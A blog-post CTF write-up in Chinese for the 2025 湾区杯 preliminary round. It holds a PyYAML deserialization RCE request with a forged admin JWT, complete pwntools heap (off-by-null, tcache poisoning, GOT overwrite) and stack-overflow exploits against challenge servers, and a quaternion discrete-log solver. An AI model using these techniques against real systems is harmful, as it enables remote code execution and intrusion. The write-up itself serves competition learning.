找到一个有回显的payload

POST /sandbox HTTP/1.1
Host: web-d0449060ee.challenge.xctf.org.cn
Origin: http://web-d0449060ee.challenge.xctf.org.cn
Referer: http://web-d0449060ee.challenge.xctf.org.cn/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK23IBmQeWwIHg2JR
Accept: */*
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0Iiwicm9sZSI6ImFkbWluIn0.h6QY-f521uX-fy_wmBSN2oVCGKChY9MATy75bfaZ6iU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 421


------WebKitFormBoundaryK23IBmQeWwIHg2JR
Content-Disposition: form-data; name="codefile"; filename="exp.yaml"
Content-Type: application/octet-stream


!!python/object/apply:subprocess.check_output [[cat,/f1111ag]]
------WebKitFormBoundaryK23IBmQeWwIHg2JR
Content-Disposition: form-data; name="mode"


yaml
------WebKitFormBoundaryK23IBmQeWwIHg2JR--

PWN#

digtal_bomb#

核心逻辑

void __noreturn heap() {
    _DWORD v0[2];
    unsigned __int64 v1;
    v1 = __readfsqword(0x28u);
    v0[1] = 1;


    while (1) {
        menu();  // 显示菜单
        v0[0] = 0;
        __isoc99_scanf("%d", v0);
        while (getchar() != 10);


        if (v0[0] == 666) {
            gift(); // 仅特殊输入触发
            continue;
        }


        if (v0[0] > 3) {
            PUTS("Invalid choice, please try again.");
        } else if (v0[0] == 1) {
            add();   // 创建消息块
        } else if (v0[0] == 2) {
            delet(); // 删除消息块
        } else if (v0[0] == 3) {
            show();  // 显示消息块
        }
    }
}

add中存在 off-by-null 漏洞,泄露堆地址有

add(9, 0x500, p64(0)+p64(0x601))
add(0, 0x4f0, b'a'*8)
add(10, 0x500, b'a'*8)
add(1, 0x4f0, b'a'*8)


free(10)
free(9)
add(9, 0x500, b'a'*4)
edit(9, b'a'*8)
show(9)


conn.recvuntil(b'a'*8)
heap = u64(conn.recv(6)+b'\x00\x00') - 0x290
print(f"[+] Heap base: {hex(heap)}")

接着伪造 chunk 和 off-by-null

  1. 在最低地址 0x510 的 chunk0 中伪造一个大小为 0x600 的 chunk。
  2. 修改 chunk0 的 fdbk 指向伪造 chunk 地址。
  3. 利用 chunk1 的 off-by-null 漏洞,修改 chunk2 的 pre_inusepre_size 位,使其 pre_size=0x600
free(0)
free(1)
free(9)
free(10)


add(0, 0x500, p64(0)+p64(0x601)+p64(heap+0x2a0)*2)
add(1, 0xf8, b'a'*8)
for i in range(2, 10):
    add(i, 0xf8, b'a'*8)
add(9, 0xf0, b'a'*8)


free(1)
add(1, 0xf8, b'a'*0xf0 + p64(0x600))
for i in range(3, 10):
    free(i)
free(2)

然后泄露 libc,利用 chunk1 指针泄露 libc 基址

add(9, 0x4f0, b'a'*8)
show(1)
conn.recvuntil(b'Show at index 1:\n')
libc_base = u64(conn.recv(6)+b'\x00\x00') - 0x21ace0
print(f"[+] libc base: {hex(libc_base)}")

接着释放无用 chunk,准备劫持

free(9)
add(8, 0x1f0, b'a'*8)
free(8)
free(1)
  1. 利用 tcache bins 伪造任意分配,获取 libc GOT 表中 strlen 地址。
  2. 覆盖 GOT,使其调用 one_gadget 达成 RCE。
key = heap >> 12
payload = b'a'*0x2f0 + p64(0x510) + p64(0x201) + p64((heap+0x10)^key)
add(3, 0x4f0, payload)
add(4, 0x1f0, b'a')
add(5, 0x1f0, p16(7)*0x40 + p64(libc_base+0x21A090)*4)
add(6, 0x20, p64(libc_base+0xebc85)*2)


conn.interactive()

完整 exp

from pwn import *
context.log_level='debug'


# conn=process('./digtal_bomb')
conn=remote("pwn-bee7897324.challenge.xctf.org.cn", 9999, ssl=True)
libc = ELF('./libc.so.6')


def ch(Id):
    conn.sendlineafter(b"Your choice >>", str(Id).encode())


def add(Id, size, payload):
    ch(1)
    conn.sendlineafter(b"Index >> \n", str(Id).encode())
    conn.sendlineafter(b"Size >> \n", str(size).encode())
    conn.send(payload)


def free(Id):
    ch(2)
    conn.sendlineafter(b"Index >> \n", str(Id).encode())


def show(Id):
    ch(3)
    conn.sendlineafter(b"Index >> \n", str(Id).encode())


def edit(Id, payload):
    ch(666)
    conn.sendlineafter(b"Index >> \n", str(Id).encode())
    conn.send(payload)


# ====== 初始化数字炸弹 ======
conn.sendlineafter(b"Enter min (0-500): ", b"498")
conn.sendlineafter(b"Enter max (0-500): ", b"500")
conn.sendlineafter(b"Your guess :", b"500")


# ====== 泄露堆地址 ======
add(9, 0x500, p64(0)+p64(0x601))
add(0, 0x4f0, b'a'*8)
add(10, 0x500, b'a'*8)
add(1, 0x4f0, b'a'*8)


free(10)
free(9)
add(9, 0x500, b'a'*4)
edit(9, b'a'*8)
show(9)


conn.recvuntil(b'a'*8)
heap = u64(conn.recv(6)+b'\x00\x00') - 0x290
print(f"[+] Heap base: {hex(heap)}")


# ====== 伪造 chunk 与 off-by-null ======
free(0)
free(1)
free(9)
free(10)


add(0, 0x500, p64(0)+p64(0x601)+p64(heap+0x2a0)*2)
add(1, 0xf8, b'a'*8)
for i in range(2, 10):
    add(i, 0xf8, b'a'*8)
add(9, 0xf0, b'a'*8)


free(1)
add(1, 0xf8, b'a'*0xf0 + p64(0x600))
for i in range(3, 10):
    free(i)
free(2)


# ====== 泄露 libc 基址 ======
add(9, 0x4f0, b'a'*8)
show(1)
conn.recvuntil(b'Show at index 1:\n')
libc_base = u64(conn.recv(6)+b'\x00\x00') - 0x21ace0
print(f"[+] libc base: {hex(libc_base)}")


free(9)
add(8, 0x1f0, b'a'*8)
free(8)
free(1)


# ====== 劫持 tcache bins 执行 RCE ======
key = heap >> 12
payload = b'a'*0x2f0 + p64(0x510) + p64(0x201) + p64((heap+0x10)^key)
add(3, 0x4f0, payload)
add(4, 0x1f0, b'a')
add(5, 0x1f0, p16(7)*0x40 + p64(libc_base+0x21A090)*4)
add(6, 0x20, p64(libc_base+0xebc85)*2)


conn.interactive()

odd_canary#

先打good让他泄露libc地址,然后打vuln栈溢出getshell

from pwn import *


context(arch='amd64', os='linux', log_level='debug')


conn = remote("pwn-685e27d009.challenge.xctf.org.cn", 9999, ssl=True)


# 加载 libc
libc_obj = ELF('./libc.so.6')


# 第一次 good 操作,泄露 libc 地址
conn.sendafter('(good/vuln/exit): ', b'good')
conn.sendafter('first:\n', b'B'*0x1f)
conn.sendafter('(good/vuln/exit): ', b'good')
conn.recvuntil(f'I will tell you good news,{"B"*0x1f}\n')


leaked_puts = u64(conn.recv(6).ljust(8, b'\x00'))
libc_base = leaked_puts - libc_obj.sym['puts']


# 计算 one_gadget 地址
og_addr = libc_base + 0xebc81


# 第二次 good 操作填充名字
conn.sendafter('name first:\n', b'B'*0x1f)


# 构造 payload
buf_prefix = b'exec'
payload = buf_prefix.ljust(0x30, b'\x00')
payload += p64(0x404800)      # bss 或者返回地址覆盖目标
payload += p64(og_addr)       # one_gadget


# 触发 vuln 栈溢出
conn.sendafter('(good/vuln/exit): ', b'vuln')
conn.sendafter('payload: \n', payload)


# 进入交互
conn.interactive()

Crypto#

new_trick#

Claude 一把梭了

  1. 有一个四元数 Q,和它的某个幂次 R = Q^secret
  2. secret < 2^50,需要找到这个secret
  3. 用secret的MD5作为AES密钥加密了flag

关键在于解决四元数的离散对数问题

from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import math


# Given parameters
p = 115792089237316195423570985008687907853269984665640564039457584007913129639747
Q_components = (123456789, 987654321, 135792468, 864297531)
R_components = (53580504271939954579696282638160058429308301927753139543147605882574336327145,
                79991318245209837622945719467562796951137605212294979976479199793453962090891,
                53126869889181040587037210462276116096032594677560145306269148156034757160128,
                97368024230306399859522783292246509699830254294649668434604971213496467857155)


encrypted_flag = b'(\xe4IJ\xfd4%\xcf\xad\xb4\x7fi\xae\xdbZux6-\xf4\xd72\x14BB\x1e\xdc\xb7\xb7\xd1\xad#e@\x17\x1f\x12\xc4\xe5\xa6\x10\x91\x08\xd6\x87\x82H\x9e'


class Quaternion:
    def __init__(self, a, b, c, d):
        self.p = p
        self.a = a % self.p
        self.b = b % self.p
        self.c = c % self.p
        self.d = d % self.p


    def __repr__(self):
        return f"Q({self.a}, {self.b}, {self.c}, {self.d})"


    def __mul__(self, other):
        a1, b1, c1, d1 = self.a, self.b, self.c, self.d
        a2, b2, c2, d2 = other.a, other.b, other.c, other.d
        a_new = a1 * a2 - b1 * b2 - c1 * c2 - d1 * d2
        b_new = a1 * b2 + b1 * a2 + c1 * d2 - d1 * c2
        c_new = a1 * c2 - b1 * d2 + c1 * a2 + d1 * b2
        d_new = a1 * d2 + b1 * c2 - c1 * b2 + d1 * a2
        return Quaternion(a_new, b_new, c_new, d_new)


    def __eq__(self, other):
        return (self.a == other.a and self.b == other.b and
                self.c == other.c and self.d == other.d)


    def conjugate(self):
        return Quaternion(self.a, -self.b, -self.c, -self.d)


    def norm_squared(self):
        return (self.a * self.a + self.b * self.b +
                self.c * self.c + self.d * self.d) % self.p


    def inverse(self):
        norm_sq = self.norm_squared()
        # Find modular inverse of norm_squared
        inv_norm = pow(norm_sq, self.p - 2, self.p)
        conj = self.conjugate()
        return Quaternion(conj.a * inv_norm, conj.b * inv_norm,
                         conj.c * inv_norm, conj.d * inv_norm)


def power(base_quat, exp):
    res = Quaternion(1, 0, 0, 0)
    base = base_quat
    while exp > 0:
        if exp % 2 == 1:
            res = res * base
        base = base * base
        exp //= 2
    return res


def baby_step_giant_step(g, h, n):
    """
    Solve discrete log: find x such that g^x = h
    n is the upper bound for x
    """
    m = int(math.ceil(math.sqrt(n)))


    # Baby steps: compute g^j for j = 0, 1, ..., m-1
    baby_steps = {}
    current = Quaternion(1, 0, 0, 0)  # g^0


    for j in range(m):
        key = (current.a, current.b, current.c, current.d)
        if key not in baby_steps:
            baby_steps[key] = j
        current = current * g


    # Giant steps: compute h * (g^(-m))^i for i = 0, 1, ..., m-1
    g_m = power(g, m)
    g_m_inv = g_m.inverse()


    gamma = h
    for i in range(m):
        key = (gamma.a, gamma.b, gamma.c, gamma.d)
        if key in baby_steps:
            x = i * m + baby_steps[key]
            if x < n:
                return x
        gamma = gamma * g_m_inv


    return None


def solve_quaternion_dlog():
    Q = Quaternion(*Q_components)
    R = Quaternion(*R_components)


    print("Starting quaternion discrete log attack...")
    print(f"Q = {Q}")
    print(f"R = {R}")


    # Try baby-step giant-step with bound 2^50
    max_secret = 2**50


    print(f"Searching for secret < {max_secret}")
    print("This may take a while...")


    # For efficiency, let's try smaller bounds first
    bounds_to_try = [2**16, 2**20, 2**24, 2**28, 2**32]


    for bound in bounds_to_try:
        print(f"Trying bound 2^{bound.bit_length()-1}...")
        secret = baby_step_giant_step(Q, R, bound)
        if secret is not None:
            print(f"Found secret: {secret}")
            return secret


    # If not found in smaller bounds, try the full range
    print("Trying full range 2^50...")
    secret = baby_step_giant_step(Q, R, max_secret)
    if secret is not None:
        print(f"Found secret: {secret}")
        return secret


    print("Could not find secret in the given range")
    return None


def decrypt_flag(secret):
    if secret is None:
        print("Cannot decrypt without secret")
        return


    # Verify the secret works
    Q = Quaternion(*Q_components)
    R_check = power(Q, secret)
    R_expected = Quaternion(*R_components)


    if R_check == R_expected:
        print("Secret verification successful!")
    else:
        print("Secret verification failed!")
        return


    # Decrypt the flag
    key = md5(str(secret).encode()).hexdigest().encode()
    cipher = AES.new(key=key, mode=AES.MODE_ECB)


    try:
        decrypted = cipher.decrypt(encrypted_flag)
        flag = unpad(decrypted, 16)
        print(f"Flag: {flag.decode()}")
    except Exception as e:
        print(f"Decryption failed: {e}")


# Alternative approach: try some common small values first
def try_small_secrets():
    Q = Quaternion(*Q_components)
    R = Quaternion(*R_components)


    print("Trying small secret values...")


    # Try some small powers
    for secret in range(1, 10000):
        if secret % 1000 == 0:
            print(f"Trying secret = {secret}")


        test_R = power(Q, secret)
        if test_R == R:
            print(f"Found secret: {secret}")
            return secret


    return None


if __name__ == "__main__":
    # First try small values
    secret = try_small_secrets()


    if secret is None:
        # If not found, try the more complex approach
        secret = solve_quaternion_dlog()


    decrypt_flag(secret)

主要思路:

  • 四元数离散对数问题通常比整数离散对数更容易解决
  • 使用分步搜索策略,从小范围开始逐步扩大
  • Baby-Step Giant-Step算法将搜索空间从O(n)降低到O(√n)
【Volcania】2025 湾区杯初赛 Writeup
https://bili33.top/posts/ctf-gbacc2025-preliminary-round-writeup/
作者
GamerNoTitle
发布于
2025-09-10
许可协议
CC BY-NC-SA 4.0
2025 湾区杯决赛(AKA 珠海旅行记录)
【Volcania】DASCTF 2025 上半年线上赛 Writeup
© 2025 GamerNoTitle. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari